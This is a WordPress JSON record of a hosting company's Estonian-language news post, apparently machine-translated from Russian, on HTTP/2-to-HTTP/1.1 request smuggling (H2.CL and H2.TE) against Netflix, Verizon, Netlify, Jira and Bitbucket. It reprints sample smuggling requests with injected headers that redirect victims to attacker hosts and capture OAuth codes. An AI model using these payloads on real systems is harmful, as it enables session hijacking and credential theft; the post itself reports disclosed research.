{"id":100934,"date":"2021-08-07T16:22:34","date_gmt":"2021-08-07T14:22:35","guid":{"rendered":"https:\/\/prohoster.info\/blog\/novosti-interneta\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy"},"modified":"2026-02-09T17:18:09","modified_gmt":"2026-02-09T15:18:09","slug":"novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","status":"publish","type":"post","link":"https:\/\/prohoster.info\/et\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","title":{"rendered":"Uus r\u00fcnnak front-end ja back-end s\u00fcsteemidele, mis v\u00f5imaldab sisestuda p\u00e4ringutesse","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>Veebis\u00fcsteemid, kus es frontend \u00fchendab HTTP\/2 kaudu ja edastab backendile HTTP\/1.1 kaudu, on saanud uue r\u00fcnnakuvariandi nimega \u201eHTTP Request Smuggling\u201d ohvriks. See r\u00fcnnak v\u00f5imaldab spetsiaalselt vormistatud kliendip\u00e4ringute saatmise kaudu siseneda teiste kasutajate p\u00e4ringute sisusse, mida t\u00f6\u00f6deldakse samas voos frontend'i ja backend'i vahel. R\u00fcnnakut saab kasutada pahatahtliku JavaScript-koodi sisestamiseks seanssi legitiimse saidiga, ligip\u00e4\u00e4supiirangute \u00fcmberhindamiseks ja autentimise parameetrite p\u00fc\u00fcdmiseks.     <\/p>\n<p>Probleem on seotud veebiprokside, koormuse tasakaalustajate, veebikiirendajate, sisu edastamise s\u00fcsteemide ja teiste konfiguratsioonidega, kus p\u00e4ringud suunatakse frontend-backend skeemi kaudu. Uuringu autor demonstreeris r\u00fcnnaku v\u00f5imalust Netflixi, Verizon'i, Bitbucket'i, Netlify CDN ja Atlassian s\u00fcsteemide vastu, teenides 56 000 dollarit haavatavuste avastamise preemiaprogrammidest. Probleemi olemasolu on kinnitatud ka F5 Networks'i toodetes. Probleem puudutab osaliselt mod_proxy'd Apache HTTP-serveris (CVE-2021-33193), parandused oodatakse versioonis 2.4.49 (arendajad said probleemist teada mai alguses ja neil oli 3 kuud parandamiseks). Nginx'is on samal ajal peatatud \u201eContent-Length\u201d ja \u201eTransfer-Encoding\u201d p\u00e4iste samaaegne m\u00e4\u00e4ramine viimases v\u00e4ljaandes (1.21.1). R\u00fcnnakute l\u00e4biviimise vahendid on juba lisatud Burp'i t\u00f6\u00f6riistakomplekti ja on saadaval Turbo Intruder laiendusena.      <\/p>\n<p>Uue p\u00e4ringute sissetoomise meetodi t\u00f6\u00f6p\u00f5him\u00f5te on sarnane sama uurija kaks aastat tagasi avastatud haavatavusele, kuid piiratud ainult s\u00fcsteemidega, mis v\u00f5tavad vastu p\u00e4ringud HTTP\/1.1 kaudu. Meenutame, et frontend-backend skeemis v\u00f5tab klientide p\u00e4ringud vastu lisamoodul - frontend, mis loob pikaajalise TCP-\u00fchenduse backend'iga, mis viib l\u00e4bi p\u00e4ringute otsese t\u00f6\u00f6tlemise. Selle \u00fchise \u00fchenduse kaudu edastatakse reeglina eri kasutajate p\u00e4ringud, mis liiguvad ahelana \u00fcksteise j\u00e4rel, eraldatuna HTTP protokolli vahenditega.     <\/p>\n<p>Klassikaline r\u00fcnnak \"HTTP Request Smuggling\" p\u00f5hines sellel, et esialgsed ja tagaplaanilised s\u00fcsteemid t\u00f5lgendavad HTTP-p\u00e4iseid \"Content-Length\" (m\u00e4\u00e4rab URL-i kogusumma) ja \"Transfer-Encoding: chunked\" (lubab andmeid edastada osade kaupa) erinevalt. N\u00e4iteks, kui esialgne s\u00fcsteem toetab ainult \"Content-Length\", kuid ignoreerib \"Transfer-Encoding: chunked\", siis r\u00fcndaja v\u00f5ib saata p\u00e4ringu, kus on samal ajal esitatud p\u00e4ised \"Content-Length\" ja \"Transfer-Encoding: chunked\", kuid \"Content-Length\" suurus ei vasta chunked-ahela suurusele. Sel juhul t\u00f6\u00f6tleb esialgne s\u00fcsteem p\u00e4ringu vastavalt \"Content-Length\"-ile, samas kui tagaplaaniline s\u00fcsteem ootab ploki l\u00f5petamist \"Transfer-Encoding: chunked\" p\u00f5hjal ja r\u00fcndaja \u00fclej\u00e4\u00e4nud p\u00e4ringu p\u00f5hi osa satub teise kliendi p\u00e4ringu algusesse.         <\/p>\n<p>Erinevalt tekstip\u00f5hisest protokollist HTTP\/1.1, mille anal\u00fc\u00fcs toimub ridade tasandil, on HTTP\/2 binaarne protokoll, mis manipuleerib eelnevalt m\u00e4\u00e4ratud suurusega andmepakettidega. HTTP\/2-s kasutatakse pseudopealkirju, mis vastavad tavalistele HTTP-pealkirjadele. Kui suhtletakse tagaplaaniga protokolli HTTP\/1.1 kaudu, t\u00f5lgendab esiplaan need pseudopealkirjad sarnasteks HTTP\/1.1 pealkirjadeks. Probleem seisneb selles, et tagaplaan teebotsuseid voogude anal\u00fc\u00fcsi osas juba esiplaani poolt seatud HTTP-pealkirjade p\u00f5hjal, omamata teavet algse p\u00e4ringu parameetrite kohta.      <\/p>\n<p>Sealhulgas pseudo-p\u00e4iside kujul v\u00f5ivad olla edastatud v\u00e4\u00e4rtused \"content-length\" ja \"transfer-encoding\", hoolimata sellest, et HTTP\/2-s neid ei kasutata, kuna k\u00f5igi andmete suurus m\u00e4\u00e4ratakse eraldi valdkonnas. Siiski HTTP\/2 p\u00e4ringu muutmisel HTTP\/1.1-ks kantakse need p\u00e4ised edasi ning v\u00f5ivad segadusse ajada tagaplaanilisi s\u00fcsteeme. Tuleb v\u00e4lja tuua kaks peamist r\u00fcnnaku varianti: H2.TE ja H2.CL, kus tagaplaaniline s\u00fcsteem petetakse vale \"transfer-encoding\" v\u00f5i \"content-length\" v\u00e4\u00e4rtusega, mis ei vasta tegelikule p\u00e4ringukehade suurusele, mis esialgsesse s\u00fcsteemi saabus HTTP\/2 protokolli kaudu.    <center><img decoding=\"async\" alt=\"Uus r\u00fcnnak front-end ja back-end s\u00fcsteemidele, mis v\u00f5imaldab sisestuda p\u00e4ringutesse\" src=\"\/wp-content\/uploads\/2021\/08\/1ea8d97902bf7c4281adce29351c96fc.png\" style=\"display:block;margin: 0 auto;\" \/><\/center>      <\/p>\n<p>H2.CL r\u00fcnnaku n\u00e4itena tuuakse esile vale suuruse m\u00e4rkimine pseudopealkirjas content-length, kui saata HTTP\/2 p\u00e4ring Netflixile. See p\u00e4ring toob kaasa sarnase HTTP-pealkirja \u0421ontent-Length lisamise, kui p\u00f6\u00f6rduda tagaplaadi poole HTTP\/1.1 kaudu, kuid kuna \u0421ontent-Lengthis m\u00e4rgitud suurus on v\u00e4iksem tegelikust, siis t\u00f6\u00f6deldakse osa andmetest l\u00f5petusena j\u00e4rgmise p\u00e4ringu algusena.     <\/p>\n<p>N\u00e4iteks, HTTP\/2 p\u00e4ring :method\tPOST :path\t\/n :authority\twww.netflix.com content-length\t4 abcdGET \/n HTTP\/1.1 Host: 02.rs?x.netflix.com Foo: bar      <\/p>\n<p>Toob viib taotluse saatekeskusesse:         POST \/n HTTP\/1.1     Host: www.netflix.com     Content-Length: 4       abcdGET \/n HTTP\/1.1     Host: 02.rs?x.netflix.com     Foo: bar    <\/p>\n<p> Kuna Content-Length on 4, siis tajub tagaplaaniline s\u00fcsteem p\u00e4ringu kehaks ainult \"abcd\", samas kui \u00fclej\u00e4\u00e4nud osa \"GET \/n HTTP\/1.1...\" t\u00f6\u00f6deldakse kui j\u00e4rgmisel kliendil olevat p\u00e4ringu algust. Vastavalt sellele juhtub voogude des\u00fcnkroniseerimine ning j\u00e4rgneva p\u00e4ringu vastuseks antakse vale p\u00e4ringu t\u00f6\u00f6tlemise tulemus. Netflixi puhul viis v\u00e4lise hosti m\u00e4\u00e4ramine p\u00e4ises \"Host:\" vale p\u00e4ringu juures kliendile vastuse jagamiseni \"Location: https:\/\/02.rs?x.netflix.com\/n\" ja v\u00f5imaldas edastada kliendile suvalist sisu, sealhulgas k\u00e4ivitada oma JavaScripti koodi Netflixi saidi kontekstis.      <\/p>\n<p>Teise r\u00fcnnaku variant (H2.TE) on seotud pealkirja 'Transfer-Encoding: chunked' sisestamisega. HTTP\/2 spetsifikatsiooni kohaselt on pseudopealkirja transfer-encoding kasutamine keelatud ning sellised p\u00e4ringud tuleb lugeda vigaseks. Sellegipoolest ei arvesta m\u00f5ned esihalduse teostused seda n\u00f5uet ning lubavad pseudopealkirja transfer-encoding kasutamise HTTP\/2-s, mis muudetakse sarnaseks pealkirjaks HTTP-s. Kui pealkiri 'Transfer-Encoding' on olemas, v\u00f5ib tagaplane v\u00f5tta selle prioriteetsemana ja t\u00f6\u00f6delda andmeid osakeste kaupa 'chunked' re\u017eiimis, kasutades erineva suurusega plokke formaadis '{suurus}\r\n{plokk}\r\n{suurus}\r\n{plokk}\r\n0', hoolimata esialgsest jagamisest vastavalt \u00fcldisele suurusele.    <\/p>\n<p>Sarnase n\u00f5rkus oli demonstreeritud ettev\u00f5tte Verizon n\u00e4itel. Probleem puudutas autentimisportaal ja <a href=\"https:\/\/prohoster.info\/et\/hosting\/hosting-wordpress\/\"  data-wpil-monitor-id=\"1168\">ja pakub teile rohkem t\u00f6\u00f6riistu isiklike veebisaitide ja koost\u00f6\u00f6v\u00f5imetega veebirakenduste loomiseks.<\/a>, mis on samuti kasutusel sellistes saitides nagu Huffington Post ja Engadget. N\u00e4iteks kliente puudutav p\u00e4ring HTTP\/2-s:       :method\tPOST     :path\t\/identitfy\/XUI     :authority\tid.b2b.oath.com     transfer-encoding\tchunked      0       GET \/oops HTTP\/1.1     Host: psres.net     Content-Length: 10       x=    <\/p>\n<p>Tekkis HTTP\/1.1 taotluse edastamine backendile:       POST \/identity\/XUI HTTP\/1.1     Host: id.b2b.oath.com     Content-Length: 66     Transfer-Encoding: chunked       0       GET \/oops HTTP\/1.1     Host: psres.net     Content-Length: 10       x=      <\/p>\n<p>Tagaplane ignoreeris omakorda pealkirja 'Content-Length' ja tegi jagamise voos p\u00f5hinedes 'Transfer-Encoding: chunked'. Praktikas v\u00f5imaldas r\u00fcnnak suunata kasutajate p\u00e4ringud oma saidile ning ka haarata OAuth autentimisega seotud p\u00e4ringuid, mille parameetrid ilmnesid viidatud pealkirjas, samas simuleerida autentimise seanssi ja algatada kasutaja logimisandmete saatmist r\u00fcndaja hostile. GET \/b2blanding\/show\/oops HTTP\/1.1 Host: psres.net Referer: https:\/\/id.b2b.oath.com\/?...&amp;code=secret GET \/ HTTP\/1.1 Host: psres.net Authorization: Bearer eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik...        <\/p>\n<p>HTTP\/2-rakenduste r\u00fcnnamiseks, mis ei luba pseudopealkirja transfer-encoding mainimist, on ette pandud veel \u00fcks meetod, mis p\u00f5hineb pealkirja 'Transfer-Encoding' sisestamisele teistele pseudopealkirjadele, eraldades need reavahe kreediga (HTTP\/1.1-s muudetakse sellisel juhul kaks eraldi HTTP-pealkirja).     <\/p>\n<p>N\u00e4iteks olid selle probleemiga haavatavad Atlassian Jira ja Netlify CDN (kasutatakse Mozilla avalehe edastamiseks Firefoxis). Eelk\u00f5ige HTTP\/2 p\u00e4ring: :method\tPOST :path\t\/ :authority\tstart.mozilla.org foo\tb\r\n transfer-encoding: chunked 0\r\n \r\n GET \/ HTTP\/1.1\r\n Host: evil-netlify-domain\r\n Content-Length: 5\r\n \r\n x=    <\/p>\n<p>kuidas see viis tagaplanele HTTP\/1.1 p\u00e4ringu saatmiseni POST \/ HTTP\/1.1\r\n Host: start.mozilla.org\r\n Foo: b\r\n Transfer-Encoding: chunked\r\n Content-Length: 71\r\n \r\n 0\r\n \r\n GET \/ HTTP\/1.1\r\n Host: evil-netlify-domain\r\n Content-Length: 5\r\n \r\n x=      <\/p>\n<p>Teine v\u00f5imalus pealkirja \"Transfer-Encoding\" asendamiseks oli selle kinnitamine m\u00f5ne teise pseudopealkirja nime v\u00f5i p\u00e4ringu meetodi rida. N\u00e4iteks Atlassian Jirale p\u00f6\u00f6rdudes, pseudopealkirja \"foo: bar\\r\\ntransfer-encoding\" v\u00e4\u00e4rtusega \"chunked\" lisati HTTP-pealkirjad \"foo: bar\" ja \"transfer-encoding: chunked\", ning pseudopealkirjas \"method\" v\u00e4\u00e4rtuse \"GET \\\/ HTTP\\\/1.1\\r\\nTransfer-encoding: chunked\" edastamine t\u00f5lgiti \"GET \\\/ HTTP\\\/1.1\\r\\ntransfer-encoding: chunked\".     <\/p>\n<p>Probleemi avastanud uurija pakkus ka v\u00e4lja p\u00e4ringute tunnelimise tehnika r\u00fcnnaku tegemiseks front-endides, kus igale <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/et\/lir\/ipv4\/\"   title=\"IP-aadressid\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"688\">IP-aadressid<\/a> seotud on eraldi \u00fchendus backendiga ning erinevate kasutajate liiklust ei segata. Ettepanekut tehnika ei luba teiste kasutajate p\u00e4ringutesse sekkuda, kuid see annab v\u00f5imaluse saata \u00fchine vahem\u00e4lu, mis m\u00f5jutab teiste p\u00e4ringute t\u00f6\u00f6tlemist, ja v\u00f5imaldab sisemiste HTTP-pealkirjade asendamist, mida kasutatakse teabe edastamiseks frontendilt backendile (n\u00e4iteks autentimise korral frontendil v\u00f5ivad sellistes pealkirjades backendile edastatavad andmed sisaldada hetke kasutaja teavet). N\u00e4itena praktikas rakendamise meetodist on vahem\u00e4lu r\u00fcnnaku abil suudetud saada kontroll lehtede \u00fcle Bitbucket teenuses.<br \/>\n<br \/>Allikas: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/www.opennet.ru\/opennews\/art.shtml?num=55601\">opennet.ru<\/a> <\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &#171;HTTP Request Smuggling&#187;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u0438\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0432\u043a\u043b\u0438\u043d\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u043c\u044b\u0445 \u0432 \u0442\u043e\u043c \u0436\u0435 \u043f\u043e\u0442\u043e\u043a\u0435 \u043c\u0435\u0436\u0434\u0443 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434\u043e\u043c \u0438 \u0431\u044d\u043a\u0435\u043d\u0434\u043e\u043c. \u0410\u0442\u0430\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043f\u043e\u0434\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e JavaScript-\u043a\u043e\u0434\u0430 \u0432 \u0441\u0435\u0430\u043d\u0441 \u0441 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u043c [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":100935,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[702],"tags":[],"class_list":["post-100934","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.0.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &quot;HTTP Request Smuggling&quot;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/et\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.0.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"et_EE\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u041d\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434-\u0431\u044d\u043a\u0435\u043d\u0434, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0432\u043a\u043b\u0438\u043d\u0438\u0442\u044c\u0441\u044f \u0432 \u0437\u0430\u043f\u0440\u043e\u0441\u044b | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &quot;HTTP Request Smuggling&quot;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/et\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2021-08-07T14:22:35+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2026-02-09T15:18:09+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Uus r\u00fcnnak frontend-backend s\u00fcsteemidele, mis v\u00f5imaldab sisestuda p\u00e4ringutesse | ProHoster","description":"Veebis\u00fcsteemid, kus front-end v\u00f5tab \u00fchendusi HTTP\/2 kaudu ja edastab need back-endile HTTP\/1.1 kaudu, on saanud uue r\u00fcnnakuvariandi \"HTTP Request Smuggling\" ohvriks, mis v\u00f5imaldab spetsiaalselt kujundatud saadetiste kaudu.","canonical_url":"https:\/\/prohoster.info\/et\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"et_EE","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u041d\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434-\u0431\u044d\u043a\u0435\u043d\u0434, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0432\u043a\u043b\u0438\u043d\u0438\u0442\u044c\u0441\u044f \u0432 \u0437\u0430\u043f\u0440\u043e\u0441\u044b | ProHoster","og:description":"Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &quot;HTTP Request Smuggling&quot;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445.","og:url":"https:\/\/prohoster.info\/et\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2021-08-07T14:22:35+00:00","article:modified_time":"2026-02-09T15:18:09+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"100934","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-08-07 15:27:20","updated":"2026-02-09 15:18:09","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/posts\/100934","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/comments?post=100934"}],"version-history":[{"count":2,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/posts\/100934\/revisions"}],"predecessor-version":[{"id":158412,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/posts\/100934\/revisions\/158412"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/media\/100935"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/media?parent=100934"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/categories?post=100934"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/tags?post=100934"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}